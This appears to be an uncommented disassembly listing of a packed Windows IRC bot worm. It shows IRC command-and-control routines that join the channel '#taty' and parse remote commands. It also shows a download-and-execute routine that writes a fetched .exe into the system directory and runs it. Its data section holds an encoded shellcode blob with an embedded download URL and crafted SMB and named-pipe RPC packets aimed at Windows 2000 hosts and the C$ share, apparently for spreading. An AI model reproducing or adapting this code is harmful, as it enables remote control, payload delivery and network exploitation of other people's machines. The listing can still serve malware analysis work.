push eax
lea eax, [ebp+var_20]
push eax
call sub_31501932
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14C]
push offset aQuitS ; "QUIT %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
xor eax, eax
pop esi
leave
retn
sub_3150315E endp
; =============== S U B R O U T I N E =======================================
sub_315031C7 proc near ; CODE XREF: UPX0:315035AC�p
mov eax, offset loc_31503AA4
call sub_31503A78
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_315010C8
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; GetTickCount
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_31503202: ; CODE XREF: sub_315031C7+EF�j
call sub_31501A32
test eax, eax
jz short loc_3150324F
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31501164 ; select
cmp eax, 0FFFFFFFFh
jz short loc_3150324F
call sub_31501D75
test eax, eax
jz short loc_31503233
push 1
call dword_315010E0 ; ExitThread
loc_31503233: ; CODE XREF: sub_315031C7+62�j
mov [ebp-4], ebx
call edi ; GetTickCount
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_31503262
mov ecx, esi
call sub_3150315E
loc_3150324F: ; CODE XREF: sub_315031C7+42�j
; sub_315031C7+59�j ...
xor eax, eax
loc_31503251: ; CODE XREF: sub_315031C7+109�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31503262: ; CODE XREF: sub_315031C7+7F�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_315032CD
mov ecx, [esi+2Ch]
push 64h
mov [ecx+eax], bl
call dword_315010A4 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_315036FD
cmp eax, ebx
jnz short loc_3150324F
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31501A32
test eax, eax
jz short loc_3150324F
push 64h
call dword_315010A4 ; Sleep
jmp loc_31503202
; ---------------------------------------------------------------------------
loc_315032BB: ; DATA XREF: UPX0:31503B1C�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_315011A8 ; closesocket
mov eax, offset loc_315032CD
retn
; ---------------------------------------------------------------------------
loc_315032CD: ; CODE XREF: sub_315031C7+B2�j
; DATA XREF: sub_315031C7+100�o
push 1
pop eax
jmp loc_31503251
sub_315031C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315032D5 proc near ; CODE XREF: sub_315036FD+9C�p
; sub_315036FD+2B7�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_315010A0
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; lstrlen
push [ebp+arg_4]
mov ebx, eax
call esi ; lstrlen
add ebx, eax
cmp ebx, 10Eh
jle short loc_31503304
push 1
pop eax
jmp short loc_31503345
; ---------------------------------------------------------------------------
loc_31503304: ; CODE XREF: sub_315032D5+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
push 64h
call dword_315010A4 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; lstrlen
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_3150119C ; send
xor eax, eax
loc_31503345: ; CODE XREF: sub_315032D5+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_315032D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150334C proc near ; CODE XREF: UPX0:3150345F�p
var_24 = qword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
call dword_31501050 ; GetSystemTime
movzx eax, [ebp+var_1A]
mov [ebp+var_4], eax
push ecx
fild [ebp+var_4]
push ecx
fstp [esp+24h+var_24]
call sub_31503A8A ; atan
movzx eax, [ebp+var_16]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503A84 ; sin
movzx eax, [ebp+var_1C]
fmul [ebp+var_C]
lea eax, [eax+eax*2]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503A7E ; cos
fadd [ebp+var_C]
fstp [ebp+var_C]
push dword ptr [ebp+var_C]
call dword_31501128 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31501932
push 8
push [ebp+arg_4]
call sub_31501932
add esp, 1Ch
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_315018BA
leave
retn
sub_3150334C endp
; ---------------------------------------------------------------------------
loc_315033E3: ; DATA XREF: sub_31501D89+128�o
mov eax, offset loc_31503ABB
call sub_31503A78
sub esp, 2E8h
push ebx
push esi
xor ebx, ebx
push edi
mov ds:dword_31506194, ebx
call sub_315018BA
mov esi, dword_31501124
call esi ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31501932
cmp ds:dword_31506190, ebx
mov edi, dword_3150106C
pop ecx
pop ecx
jz short loc_31503438
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; lstrcat
loc_31503438: ; CODE XREF: UPX0:3150342B�j
lea eax, [ebp-4Ch]
push offset a13 ; "13"
push eax
call edi ; lstrcat
lea ecx, [ebp-2F4h]
call sub_31502D7C
mov [ebp-4], ebx
loc_31503451: ; CODE XREF: UPX0:315035B8�j
; UPX0:315035DE�j
push offset dword_31506198
lea eax, [ebp-18h]
push offset dword_3150619C
push eax
call sub_3150334C
add esp, 0Ch
loc_31503467: ; CODE XREF: UPX0:3150347B�j
call sub_31501A32
test eax, eax
jnz short loc_3150347D
push 3E8h
call dword_315010A4 ; Sleep
jmp short loc_31503467
; ---------------------------------------------------------------------------
loc_3150347D: ; CODE XREF: UPX0:3150346E�j
xor ebx, ebx
call esi ; rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31501932
pop ecx
xor edi, edi
pop ecx
loc_31503498: ; CODE XREF: UPX0:315034D4�j
push 1A0Bh
lea ecx, [ebp-2F4h]
push off_31505E04
call sub_31502D91
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DC7
test eax, eax
jz short loc_3150352B
inc edi
cmp edi, 8
jl short loc_31503498
xor edi, edi
loc_315034D8: ; CODE XREF: UPX0:31503527�j
call sub_31501A32
test eax, eax
jz short loc_31503539
push 1A0Bh
call esi ; rand
push 13h
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-2F4h]
push off_31505E04[edx*4]
call sub_31502D91
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlen
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DC7
test eax, eax
jz short loc_31503536
inc edi
cmp edi, 4Ch
jb short loc_315034D8
jmp short loc_31503539
; ---------------------------------------------------------------------------
loc_3150352B: ; CODE XREF: UPX0:315034CE�j
push 1
pop ebx
mov ds:dword_31506194, ebx
jmp short loc_31503542
; ---------------------------------------------------------------------------
loc_31503536: ; CODE XREF: UPX0:31503521�j
push 1
pop ebx
loc_31503539: ; CODE XREF: UPX0:315034DF�j
; UPX0:31503529�j
cmp ds:dword_31506194, 0
jz short loc_31503551
loc_31503542: ; CODE XREF: UPX0:31503534�j
lea eax, [ebp-18h]
push offset aTaty ; "#taty"
push eax
call dword_31501088 ; lstrcpy
loc_31503551: ; CODE XREF: UPX0:31503540�j
test ebx, ebx
jz short loc_315035C9
call sub_31501A32
test eax, eax
jz short loc_315035C9
loc_3150355E: ; CODE XREF: UPX0:31503583�j
lea eax, [ebp-18h]
lea ecx, [ebp-2F4h]
push eax
call sub_3150308C
test eax, eax
jz short loc_31503585
push 3E8h
call dword_315010A4 ; Sleep
call sub_31501A32
test eax, eax
jnz short loc_3150355E
loc_31503585: ; CODE XREF: UPX0:3150356F�j
cmp ds:dword_31506194, 0
jz short loc_31503595
mov edx, 0A8C0h
jmp short loc_315035A5
; ---------------------------------------------------------------------------
loc_31503595: ; CODE XREF: UPX0:3150358C�j
call esi ; rand
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_315035A5: ; CODE XREF: UPX0:31503593�j
push edx
lea ecx, [ebp-2F4h]
call sub_315031C7
call sub_31501A32
test eax, eax
jz loc_31503451
lea ecx, [ebp-2F4h]
call sub_3150315E
loc_315035C9: ; CODE XREF: UPX0:31503553�j
; UPX0:3150355C�j
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_315010A4 ; Sleep
jmp loc_31503451
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315035E3 proc near ; CODE XREF: sub_315036FD+5E�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31501154 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_3150360E
push 1
jmp loc_315036A4
; ---------------------------------------------------------------------------
loc_3150360E: ; CODE XREF: sub_315035E3+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31501068 ; GetSystemDirectoryA
mov edi, dword_3150106C
lea eax, [ebp+var_110]
push offset asc_31505CE0 ; "\\"
push eax
call edi ; lstrcat
lea eax, [ebp+var_110]
push 6
push eax
call dword_315010A0 ; lstrlen
lea eax, [ebp+eax+var_110]
push eax
call sub_31501932
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcat
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_315010EC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31503684
push 2
jmp short loc_315036A4
; ---------------------------------------------------------------------------
loc_31503684: ; CODE XREF: sub_315035E3+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31501150 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_315036A7
push [ebp+var_4]
call dword_315010BC ; CloseHandle
push 3
loc_315036A4: ; CODE XREF: sub_315035E3+26�j
; sub_315035E3+9F�j
pop eax
jmp short loc_315036F8
; ---------------------------------------------------------------------------
loc_315036A7: ; CODE XREF: sub_315035E3+B4�j
mov edi, 100000h
push edi
call sub_315027DB
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31501158 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_3150104C ; WriteFile
push [ebp+var_4]
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31501962
push ebx
call sub_315027EF
add esp, 0Ch
xor eax, eax
loc_315036F8: ; CODE XREF: sub_315035E3+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_315035E3 endp
; =============== S U B R O U T I N E =======================================
sub_315036FD proc near ; CODE XREF: sub_315031C7+D1�p
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 2CCh
push ebx
push ebp
push esi
push edi
push offset dword_3150619C
mov esi, ecx
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
mov edi, dword_315010C8
pop ecx
mov ebx, eax
pop ecx
mov [esp+2DCh+var_2CC], ebx
call edi ; GetTickCount
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_3150373C
and dword ptr [esi+284h], 0
loc_3150373C: ; CODE XREF: sub_315036FD+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_3150379E
call edi ; GetTickCount
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_3150379E
lea eax, [esi+180h]
push eax
call sub_315035E3
test eax, eax
pop ecx
jnz short loc_3150379E
call edi ; GetTickCount
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+2E0h+var_2C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+284h], 1
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [esp+2DCh+var_2C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032D5
loc_3150379E: ; CODE XREF: sub_315036FD+43�j
; sub_315036FD+55�j ...
test ebx, ebx
jz loc_315039DC
push ebx
call dword_315010A0 ; lstrlen
cmp eax, 0Ah
jle loc_315039DC
mov ebp, dword_31501110
add ebx, 8
push 7Ch
push ebx
call ebp ; strchr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_315039DC
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlen
cmp eax, 100h
jge loc_31503A03
push ds:dword_31506198
lea eax, [esp+2E0h+var_200]
push ebx
push eax
call sub_31502D17
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_315039DC
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlen
cmp eax, 100h
jge loc_31503A03
push ds:dword_31506198
lea eax, [esi+180h]
push ebx
push eax
call sub_31502D17
add esp, 0Ch
lea eax, [esp+2DCh+var_200]
push offset aE ; "e"
push eax
call dword_31501040 ; lstrcmp
mov ebx, dword_31501088
test eax, eax
jnz loc_31503943
lea eax, [esi+180h]
push eax
call dword_315010A0 ; lstrlen
cmp eax, 0FFh
jge loc_31503943
cmp dword ptr [esi+284h], 0
jnz loc_31503943
cmp dword ptr [esi+7Ch], 0
jnz loc_31503943
lea eax, [edi+1]
push 7Ch
push eax
call ebp ; strchr
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_31503924
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_315010A0 ; lstrlen
cmp eax, 100h
jge loc_31503A03
lea eax, [edi+1]
push eax
lea eax, [esp+2E0h+var_100]
push eax
call ebx ; lstrcpy
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx ; lstrcpy
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+2DCh+var_100], 65h
jle short loc_31503931
lea eax, [esp+2DCh+var_FF]
push eax
call dword_315010F8 ; atoi
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_31503931
cmp ebp, 0E10h
jnb short loc_31503931
call dword_31501124 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_315010C8 ; GetTickCount
mov [esi+74h], eax
jmp short loc_31503931
; ---------------------------------------------------------------------------
loc_31503924: ; CODE XREF: sub_315036FD+19D�j
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
push eax
call ebx ; lstrcpy
loc_31503931: ; CODE XREF: sub_315036FD+1E9�j
; sub_315036FD+1FE�j ...
lea eax, [esi+80h]
push offset asc_31506114 ; "|"
push eax
call dword_3150106C ; lstrcat
loc_31503943: ; CODE XREF: sub_315036FD+15A�j
; sub_315036FD+172�j ...
mov ebp, dword_31501040
lea eax, [esp+2DCh+var_200]
push offset aI ; "i"
push eax
call ebp ; lstrcmp
test eax, eax
jnz short loc_315039B9
lea eax, [esp+2DCh+var_2C8]
push offset dword_315061BC
push eax
call ebx ; lstrcpy
lea eax, [esp+2DCh+var_2C8]
push 63h
push eax
push 7
push 400h
call dword_31501040+4
push ds:dword_31506188
lea eax, [esp+2E0h+var_2C8]
push eax
lea eax, [esp+2E4h+var_264]
push ds:dword_31506184
push ds:dword_3150614C
push offset aDD13SD ; "%d,%d,13%s,%d"
push eax
call dword_3150113C ; wsprintfA
add esp, 18h
lea eax, [esp+2DCh+var_264]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032D5
loc_315039B9: ; CODE XREF: sub_315036FD+25D�j
lea eax, [esp+2DCh+var_200]
push offset aQ ; "q"
push eax
call ebp ; lstrcmp
test eax, eax
jnz short loc_315039D9
cmp [esi+284h], eax
jz short loc_315039D9
push 1
pop eax
jmp short loc_31503A05
; ---------------------------------------------------------------------------
loc_315039D9: ; CODE XREF: sub_315036FD+2CD�j
; sub_315036FD+2D5�j
mov byte ptr [edi], 7Ch
loc_315039DC: ; CODE XREF: sub_315036FD+A3�j
; sub_315036FD+B3�j ...
cmp dword ptr [esi+284h], 0
jz short loc_31503A03
push offset aJoin ; "JOIN"
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503A03
call dword_31501124 ; rand
loc_31503A03: ; CODE XREF: sub_315036FD+E2�j
; sub_315036FD+123�j ...
xor eax, eax
loc_31503A05: ; CODE XREF: sub_315036FD+2DA�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 2CCh
retn 4
sub_315036FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A12 proc near ; CODE XREF: sub_315011C0+128�p
; sub_315011C0+134�p ...
jmp dword_31501134
sub_31503A12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A18 proc near ; CODE XREF: sub_315011C0+9C�p
; sub_315011C0+C5�p ...
jmp dword_31501130
sub_31503A18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A1E proc near ; CODE XREF: sub_315011C0+93�p
; sub_315011C0+B2�p ...
jmp dword_3150112C
sub_31503A1E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31503A30 proc near ; CODE XREF: sub_315011C0+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31503A50
loc_31503A3C: ; CODE XREF: sub_31503A30+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31503A3C
loc_31503A50: ; CODE XREF: sub_31503A30+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31503A30 endp
; ---------------------------------------------------------------------------
align 10h
loc_31503A60: ; DATA XREF: sub_31501D89+A�o
jmp dword ptr loc_3150111C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A66 proc near ; CODE XREF: sub_31501F46+10C�p
; sub_31501F46+119�p ...
jmp dword_31501118
sub_31503A66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A6C proc near ; CODE XREF: sub_31501F46+35�p
jmp dword_31501114
sub_31503A6C endp
; ---------------------------------------------------------------------------
loc_31503A72: ; CODE XREF: UPX0:31503AA9�j
; UPX0:31503AC0�j
jmp dword ptr locret_3150110A+2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A78 proc near ; CODE XREF: sub_315031C7+5�p
; UPX0:315033E8�p
jmp dword ptr loc_31501108
sub_31503A78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A7E proc near ; CODE XREF: sub_3150334C+4F�p
jmp dword_31501104
sub_31503A7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A84 proc near ; CODE XREF: sub_3150334C+34�p
jmp dword_31501100
sub_31503A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A8A proc near ; CODE XREF: sub_3150334C+1F�p
jmp dword_315010FC
sub_31503A8A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A90 proc near ; CODE XREF: sub_3150246B+AB�p
jmp dword_31501084
sub_31503A90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A96 proc near ; CODE XREF: sub_3150246B+64�p
jmp dword_3150107C
sub_31503A96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A9C proc near ; CODE XREF: sub_3150246B+2D�p
jmp dword_31501078
sub_31503A9C endp
; ---------------------------------------------------------------------------
align 4
loc_31503AA4: ; DATA XREF: sub_315031C7�o
mov eax, offset dword_31503AC8
jmp loc_31503A72
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-2F4h]
jmp loc_31502DAF
; ---------------------------------------------------------------------------
loc_31503ABB: ; DATA XREF: UPX0:loc_315033E3�o
mov eax, offset dword_31503B20
jmp loc_31503A72
; ---------------------------------------------------------------------------
align 4
dword_31503AC8 dd 19930520h, 2, 31503AE8h, 1, 31503AF8h, 3 dup(0)
; DATA XREF: UPX0:loc_31503AA4�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 31503B10h, 4 dup(0)
dd offset loc_315032BB
dword_31503B20 dd 19930520h, 1, 31503B40h, 5 dup(0) ; DATA XREF: UPX0:loc_31503ABB�o
dd 0FFFFFFFFh, 31503AB0h, 52Eh dup(0)
byte_31505000 db 0EBh ; DATA XREF: sub_315011C0+24E�o
; sub_315011C0+260�o ...
db 58h
word_31505002 dw 7468h ; DATA XREF: sub_31502252+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EFB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C371C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B271C999h
dd 99C99998h, 0E3F367C9h, 0DF1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A00414D9h, 99C99998h
dd 9171CAC9h, 99C99998h, 61688DC9h, 0AC1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992471h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993A71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DF2Ch, 0C9C999C9h, 0C9991171h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DF2C66CBh, 99C99998h, 0AC2C66C9h
dd 99C99998h, 990A71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ACh, 1A71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A00414h, 0C999C999h, 99E871CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FF71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 0C999F0AAh, 2 dup(0C999C999h)
dd 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 6 dup(0C999C999h)
dd 0F5CAC999h, 99E9FCFCh, 0EBFCF2C9h, 0AAF5FCF7h, 0C7C999ABh
dd 59AAF934h, 2A2A25B4h, 93ACC966h, 0C9B78190h, 639D909Ch
dd 71CDC983h, 99C99992h, 0BFC999C9h, 14513519h, 0A95BDFDh
dd 34C79172h, 99C871F9h, 99C999C9h, 0A5D212C9h, 0E180D512h
dd 6FAA529Ah, 9A2A8D14h, 8B12B9C8h, 59AA4A9Ah, 0AB9E5958h
dd 0A319DB9Bh, 6CECC999h, 85BDDDA2h, 0A2DF9EEDh, 44EB81E8h
dd 0BDC81255h, 2E964A9Ah, 0D812EB8Dh, 125A9A85h, 5A9A099Dh
dd 85BDDD10h, 0D31C10F8h, 99C99998h, 664966C9h, 12FEFD7Fh
dd 0C999A987h, 1295C212h, 821285C2h, 5A91C212h, 0FDF7FCB7h
dd 0B7h
dword_315052C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_315011C0+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31505354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_31505400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_315054E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_315011C0+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31505544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_315055B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31505654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_315056D4 dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_315011C0+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
